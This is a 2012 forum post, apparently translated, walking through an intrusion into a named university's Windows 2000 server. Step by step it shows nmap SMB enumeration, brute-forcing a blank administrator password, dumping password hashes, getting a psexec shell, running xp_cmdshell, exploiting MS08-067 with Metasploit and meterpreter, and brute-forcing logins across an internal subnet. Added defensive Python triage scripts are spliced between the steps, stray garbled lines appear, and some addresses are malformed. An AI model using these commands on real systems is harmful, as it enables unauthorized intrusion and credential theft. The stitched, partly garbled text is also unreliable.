nmap+msf intrusion of Guangxi Normal University

Posted 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
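The service scan above is the kind of output a defender should be able to read mechanically: it reveals an unsupported operating system (Windows 2000) and four services (135, 139, 445, 3389) that have no business being reachable from the Internet. The following Python script is an added example, not code from the post or from Nmap; it parses the PORT/STATE/SERVICE/VERSION table of Nmap's normal output and sorts the open ports into review categories. The INTERNAL_ONLY port list and the EOL_MARKERS strings are the example's own assumptions, and the embedded scan text is a trimmed copy of the output above.

```python
"""Triage an Nmap service scan (normal output) for exposure findings.

Added example: this is not code from the post. The exposure list and the
end-of-life markers are the example's own assumptions, not Nmap output.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample: the port table from the -sS -sV scan above, trimmed.
SAMPLE_SCAN = r"""
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
Service Info: OS: Windows
"""

# One row of the PORT/STATE/SERVICE/VERSION table; the VERSION column is optional.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Assumption: services that should never be reachable from untrusted networks.
INTERNAL_ONLY = {
    135: "MSRPC endpoint mapper",
    139: "NetBIOS session service",
    445: "SMB (microsoft-ds)",
    3389: "Remote Desktop",
}
# Assumption: version strings that identify an operating system without vendor support.
EOL_MARKERS = ("Windows 2000", "Windows NT 4", "Windows XP")


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str
    uncertain: bool  # Nmap appends '?' when the service match is a low-confidence guess


def parse_ports(report: str) -> List[PortRecord]:
    """Return one record per row of the port table; all other lines are ignored."""
    records = []
    for line in report.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        records.append(PortRecord(int(port), proto, state, service.rstrip("?"),
                                  (version or "").strip(), service.endswith("?")))
    return records


def triage(report: str) -> Dict[str, List[str]]:
    """Group the open ports into review categories for an exposure assessment."""
    findings: Dict[str, List[str]] = {"exposed": [], "eol_os": [], "verify": []}
    for rec in parse_ports(report):
        if rec.state != "open":
            continue
        if rec.port in INTERNAL_ONLY:
            findings["exposed"].append(f"{rec.port}/{rec.proto} {INTERNAL_ONLY[rec.port]}")
        for marker in EOL_MARKERS:
            if marker in rec.version:
                findings["eol_os"].append(f"{rec.port}/{rec.proto} reports {marker}")
        if rec.uncertain:
            findings["verify"].append(f"{rec.port}/{rec.proto} {rec.service} (low-confidence match)")
    return findings


if __name__ == "__main__":
    for category, items in triage(SAMPLE_SCAN).items():
        print(category)
        for item in items:
            print("  -", item)
```

Run it as-is to see the three categories for the sample, or feed it a saved `nmap -oN` file instead of SAMPLE_SCAN. Ports with a '?' suffix land in "verify" rather than being treated as identified, because Nmap's low-confidence matches (here 3372 and 3389) are exactly the ones that deserve a manual look before any conclusion is drawn.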

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  // list the SMB scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser  // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
6 F! h, W) b: x& V8 W6 P) `
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.2418)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
6 e3 ?# I: X4 O- _3 O  F. D& `
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2  // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
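The dump above tells an administrator three things before any cracking takes place: two accounts have no password at all (the "NO PASSWORD" marker, including the built-in Administrator, RID 500), the host still stores LM hashes, and an LM hash whose second half is the well-known empty-block value AAD3B435B51404EE belongs to a password of seven characters or fewer. The Python script below is an added example, not code from the post or from the pwdump/smb-pwdump tools; it reads the "user:rid => LM:NT" layout shown above and turns it into a per-account hygiene report. The constant names, the issue wording and the NoLMHash recommendation are the example's own; the sample lines are copied from the output above.

```python
"""Audit a hash dump for blank passwords and LM hash storage.

Added example, not code from the post. It reads the smb-pwdump result
layout shown above ("user:rid => LM:NT"); the wording of the issues and
the remediation hints are the example's own.
"""
import re
from dataclasses import dataclass
from typing import List

NO_PASSWORD = "NO PASSWORD"                     # pwdump marker for an empty hash field
LM_EMPTY_HALF = "AAD3B435B51404EE"              # LM hash of an empty 7-byte half
NT_EMPTY = "31D6CFE0D16AE931B73C59D7E0C089C0"   # NT hash of the empty password

# Constructed sample: the smb-pwdump output from above.
SAMPLE_PWDUMP = """\
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""

# "| user:rid => lm:nt" or "|_user:rid => lm:nt"; the hash fields may be the NO PASSWORD marker.
ENTRY = re.compile(r"^\|[_ ]\s*(?P<user>[^:]+):(?P<rid>\d+)\s*=>\s*(?P<lm>[^:]+):(?P<nt>[^:]+)$")


@dataclass
class AccountFinding:
    user: str
    rid: int
    issues: List[str]


def audit_pwdump(text: str) -> List[AccountFinding]:
    """One finding per account; an empty issues list means nothing was flagged."""
    results = []
    for line in text.splitlines():
        m = ENTRY.match(line.strip())
        if not m:
            continue
        user, rid = m["user"].strip(), int(m["rid"])
        lm, nt = m["lm"].strip().upper(), m["nt"].strip().upper()
        issues = []
        # Either the dump's marker or the NT hash of "" means the account has no password.
        if nt.startswith(NO_PASSWORD) or nt == NT_EMPTY:
            issues.append("blank password")
            if rid == 500:
                issues.append("built-in Administrator (RID 500) without a password")
        # An LM hash other than the marker or the all-empty value means LM storage is on.
        lm_stored = not lm.startswith(NO_PASSWORD) and lm != LM_EMPTY_HALF * 2
        if lm_stored:
            issues.append("LM hash stored (enable NoLMHash, reset password)")
            if lm.endswith(LM_EMPTY_HALF):
                issues.append("password is 7 characters or fewer")
        results.append(AccountFinding(user, rid, issues))
    return results


if __name__ == "__main__":
    for finding in audit_pwdump(SAMPLE_PWDUMP):
        print(f"{finding.user} (RID {finding.rid}): {'; '.join(finding.issues) or 'ok'}")
```

The LM check works because the LM scheme hashes each 7-byte half of the (uppercased, padded) password separately, so the second half of any password of seven characters or fewer is the constant AAD3B435B51404EE; a host that still produces LM hashes at all should have the NoLMHash policy enabled and the affected passwords changed, since the hash is only regenerated at the next password change.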
! N5 \7 s  l) ^5 F& X2 A0 `
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe  // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "  // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241  // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
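Taken together, the smb-enum-users, smb-enum-shares, smb-brute and smb-check-vulns results above are a complete hardening checklist for this host: anonymous account enumeration, a null-session-readable IPC$ share, a blank administrator password, and an unpatched MS08-067. The Python script below is an added example, not code from the post or from Nmap; it parses the "Host script results" section of Nmap's normal output, groups the lines by NSE script, and emits findings with a severity and a remediation. The severities, the remediation texts and the Finding/assess names are the example's own assumptions; the sample block is the four results from above stacked into one report.

```python
"""Turn Nmap SMB host-script results into findings with remediation.

Added example, not code from the post. The severities and remediation
texts are the example's own assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample: the smb-enum-users, smb-enum-shares, smb-brute and
# smb-check-vulns results shown above, stacked into one block.
SAMPLE_RESULTS = """\
Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

# A block header is "| <script-name>:" (NSE script names are lowercase);
# anything after the colon is a one-line result.
HEADER = re.compile(r"^ (?P<name>[a-z0-9-]+):(?P<rest>.*)$")


def split_scripts(text: str) -> Dict[str, List[str]]:
    """Group the '|'-prefixed result lines by the script that produced them."""
    scripts: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue
        body = raw[1:]
        if body.startswith("_"):          # '|_' marks the last line of a block
            body = " " + body[1:]
        m = None if body.startswith("  ") else HEADER.match(body)
        if m:
            current = m["name"]
            scripts[current] = []
            if m["rest"].strip():
                scripts[current].append(m["rest"].strip())
        elif current is not None and body.strip():
            scripts[current].append(body.strip())
    return scripts


@dataclass
class Finding:
    severity: str
    source: str
    detail: str
    remediation: str


def assess(text: str) -> List[Finding]:
    """Derive findings from the four SMB scripts used in the post."""
    scripts = split_scripts(text)
    findings: List[Finding] = []

    for line in scripts.get("smb-enum-users", []):
        if "Users:" in line:
            names = [u.strip() for u in line.split("Users:", 1)[1].split(",")]
            findings.append(Finding("medium", "smb-enum-users",
                f"{len(names)} accounts enumerable anonymously: {', '.join(names)}",
                "restrict anonymous SAM enumeration (Lsa RestrictAnonymous / RestrictAnonymousSAM)"))

    share = None  # share lines alternate with their "Anonymous access:" line
    for line in scripts.get("smb-enum-shares", []):
        if line.startswith("Anonymous access:"):
            level = line.split(":", 1)[1].strip()
            if level != "<none>" and share:
                findings.append(Finding("high", "smb-enum-shares",
                    f"{share} allows anonymous {level}",
                    "disable null sessions and block 139/445 from untrusted networks"))
        else:
            share = line

    for line in scripts.get("smb-brute", []):
        if "Login was successful" in line:
            user, _, secret = line.split(" => ", 1)[0].partition(":")
            what = "blank password" if secret == "<blank>" else "guessable password"
            findings.append(Finding("critical", "smb-brute", f"{user}: {what}",
                "reset the password; enforce length/complexity and account lockout"))

    for line in scripts.get("smb-check-vulns", []):
        bulletin, _, status = line.partition(":")
        if status.strip().upper() == "VULNERABLE":
            findings.append(Finding("critical", "smb-check-vulns",
                f"{bulletin.strip()} unpatched",
                f"install the {bulletin.strip()} update, or isolate the host if its OS is out of support"))
    return findings


if __name__ == "__main__":
    for f in assess(SAMPLE_RESULTS):
        print(f"[{f.severity}] {f.source}: {f.detail} -> {f.remediation}")
```

The splitter keys on Nmap's own conventions: a line of the form "| name:" opens a script block, deeper-indented lines belong to it, and "|_" marks the block's last line. Pointing the script at a saved `nmap -oN` report of a host therefore yields the same four kinds of finding, which is the view a blue team wants from the very scans the post runs for the opposite purpose.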

root@bt:~# msfconsole  // use msf to exploit the ms08-067 overflow vulnerability against the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the obtained hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~